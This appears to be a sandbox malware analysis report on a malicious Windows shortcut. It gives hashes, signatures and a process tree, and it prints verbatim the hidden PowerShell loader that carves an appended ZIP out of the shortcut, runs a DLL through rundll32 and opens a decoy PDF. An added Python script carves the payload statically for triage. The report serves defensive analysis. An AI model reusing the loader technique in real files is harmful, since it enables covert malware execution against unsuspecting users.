Analysis
max time kernel: 120s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09/02/2023, 15:36
Static task: static1
Behavioral task: behavioral1
  Sample: 647bb02b78e1186ff014133f5f948f6a72d3ae3edfb19d7d3293fb36d0c2c20a.lnk
  Resource: win7-20221111-en
Behavioral task: behavioral2
  Sample: 647bb02b78e1186ff014133f5f948f6a72d3ae3edfb19d7d3293fb36d0c2c20a.lnk
  Resource: win10v2004-20220812-en
General
Target: 647bb02b78e1186ff014133f5f948f6a72d3ae3edfb19d7d3293fb36d0c2c20a.lnk
Size: 593KB (the loader stage in the process tree selects a .lnk of exactly 608066 bytes, i.e. 593.8 KiB, consistent with this sample locating itself by size)
MD5: f6c23891999c108068f9b119f552729c
SHA1: f528f19b55119180c9202a2e22059590756d1185
SHA256: 647bb02b78e1186ff014133f5f948f6a72d3ae3edfb19d7d3293fb36d0c2c20a
SHA512: 4a5394474e9833ee00c3f405d89d284703f9578551b4b75b254968c4c6276bbb47922b74a4cfe8917a698d7c104c02afacf1cbea2ee682993d15ecabf8eacd0c
SSDEEP: 12288:wHQSYtswIsMXhZEpUrvXVX1dPb7dnJGnpu8QjUDZUndu8kd:w7RsMXhuePVFVJknpu8Qj68kd
Malware Config
Signatures

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
  description: Key value queried
  ioc: \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation
  process: cmd.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious use of WriteProcessMemory (2 IoCs)
  description: PID 4948 wrote to memory of 5080 | pid: 4948 | process: cmd.exe | procid_target: 82
  description: PID 4948 wrote to memory of 5080 | pid: 4948 | process: cmd.exe | procid_target: 82
Processes

1. C:\Windows\system32\cmd.exe (PID 4948)
   Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\647bb02b78e1186ff014133f5f948f6a72d3ae3edfb19d7d3293fb36d0c2c20a.lnk
   Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
   2. C:\Windows\system32\cmd.exe (PID 5080, child of 4948)
      Command line (verbatim as logged): "C:\Windows\system32\cmd.exe" /c/c -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq 00608066} ^| Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = 'C:\Users\Admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[003464..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force ^| Out-Null;^& rundll32.exe $obf_dir\bloated-pestilence.dll,runner; .\sample.pdf

What the second-stage command does, step by step (`^|` and `^&` are cmd.exe escapes for `|` and `&`; PowerShell reads leading-zero literals such as 00608066 and 003464 as decimal):
- Finds a .lnk in the current directory whose length is exactly 608066 bytes, i.e. the shortcut itself, and reads the whole file into memory.
- Writes every byte from offset 3464 onward to a tmp<random>.zip file in the user's Temp directory (the logged path is a literal, which the script nonetheless passes through ExpandEnvironmentVariables): the shortcut carries a ZIP archive appended after the shortcut data.
- Changes into that directory, expands the archive in place, and deletes the ZIP.
- Runs rundll32.exe on the dropped bloated-pestilence.dll, calling its exported function runner.
- Opens sample.pdf from the same directory, a decoy document for the user.

Caveat for readers of this trace: no powershell.exe or rundll32.exe process appears, and the tree ends at PID 5080. The logged arguments (`/c/c -windowstyle hidden ...`) are PowerShell syntax with no interpreter token in front of them, which is consistent with the chain not progressing past this point in this run; the payload DLL and its behaviour are therefore not covered by the signatures above.
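The second-stage command above carves a ZIP out of the shortcut's own bytes and executes what it finds. The following is an added example (not part of the sandbox report or of the sample) that does the same carving statically in Python, so an analyst can list the dropped files without running the loader. It assumes only the public ShellLinkHeader layout (MS-SHLLINK: header size 0x4C and the fixed LinkCLSID), the size and offset values read from the command line (608066 and 3464), and a size threshold of my own choosing; the .lnk blob it analyses is constructed in memory as a stand-in for the real file, with a dummy DLL body.

```python
"""Static carving of a ZIP payload appended to a Windows shortcut (.lnk).

Added example, not part of the sandbox report or the sample. The .lnk blob
built by build_sample() is a constructed stand-in for the real file."""
import io
import zipfile
from typing import Optional

# ShellLinkHeader (MS-SHLLINK 2.1): HeaderSize 0x4C little-endian, followed by
# the LinkCLSID 00021401-0000-0000-C000-000000000046 in on-disk byte order.
SHELL_LINK_HEADER_SIZE = 0x4C
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
ZIP_LOCAL_FILE_HEADER = b"PK\x03\x04"

# Values taken from the loader's command line in the report: it selects a .lnk
# of exactly this size and carves from this offset (PowerShell treats the
# leading-zero literals 00608066 and 003464 as decimal).
OBSERVED_LNK_SIZE = 608066
OBSERVED_ZIP_OFFSET = 3464

# Heuristic threshold (my assumption, not from the report): genuine shortcuts
# are a few KB, so a much larger .lnk deserves a look for appended data.
OVERSIZED_LNK_THRESHOLD = 64 * 1024


def is_shell_link(data: bytes) -> bool:
    """True if the blob starts with a valid HeaderSize and LinkCLSID."""
    return data[:len(LNK_MAGIC)] == LNK_MAGIC


def find_zip_offset(data: bytes, hint: Optional[int] = None) -> Optional[int]:
    """Offset of an appended ZIP local file header, or None if there is none.

    A hint (e.g. the 3464 recovered from the loader script) is checked first;
    otherwise the file is scanned forward from the end of the fixed header."""
    if hint is not None and data[hint:hint + 4] == ZIP_LOCAL_FILE_HEADER:
        return hint
    pos = data.find(ZIP_LOCAL_FILE_HEADER, SHELL_LINK_HEADER_SIZE)
    return None if pos == -1 else pos


def list_zip_entries(data: bytes, offset: int) -> list:
    """Parse the bytes from `offset` onward as a ZIP; return (name, size) pairs.

    Read-only equivalent of the loader's WriteAllBytes + Expand-Archive step."""
    with zipfile.ZipFile(io.BytesIO(data[offset:])) as zf:
        return [(zi.filename, zi.file_size) for zi in zf.infolist()]


def analyse_lnk(data: bytes, hint: Optional[int] = None) -> dict:
    """Triage summary: header validity, size anomaly, appended-ZIP offset,
    its entries, and any DLLs a rundll32 stage could load from it."""
    valid = is_shell_link(data)
    offset = find_zip_offset(data, hint) if valid else None
    entries = list_zip_entries(data, offset) if offset is not None else []
    return {
        "is_lnk": valid,
        "size": len(data),
        "oversized": len(data) > OVERSIZED_LNK_THRESHOLD,
        "zip_offset": offset,
        "entries": entries,
        "dlls": [name for name, _ in entries if name.lower().endswith(".dll")],
    }


def build_sample(zip_offset: int = OBSERVED_ZIP_OFFSET, decoy_size: int = 32) -> bytes:
    """Constructed stand-in for the real sample: a minimal ShellLinkHeader,
    zero padding up to `zip_offset`, then a ZIP holding the two file names
    seen in the report. The DLL body is a dummy, not a real PE."""
    zip_buf = io.BytesIO()
    with zipfile.ZipFile(zip_buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("bloated-pestilence.dll", b"MZ" + b"\x00" * 62)
        zf.writestr("sample.pdf", b"%PDF-1.4\n" + b"%" * decoy_size)
    header = LNK_MAGIC + b"\x00" * (SHELL_LINK_HEADER_SIZE - len(LNK_MAGIC))
    padding = b"\x00" * (zip_offset - SHELL_LINK_HEADER_SIZE)
    return header + padding + zip_buf.getvalue()


if __name__ == "__main__":
    for key, value in analyse_lnk(build_sample(), hint=OBSERVED_ZIP_OFFSET).items():
        print(f"{key}: {value}")
```

Two practical notes. First, because the loader locates itself by exact file size, any byte appended to or removed from the shortcut (for instance by a tool that rewrites .lnk metadata) silently breaks the chain, so carve from an untouched copy. Second, the scan in find_zip_offset only looks for the local-file-header magic; for a real sample, confirm the offset against the one recovered from the script, as done here with the hint argument.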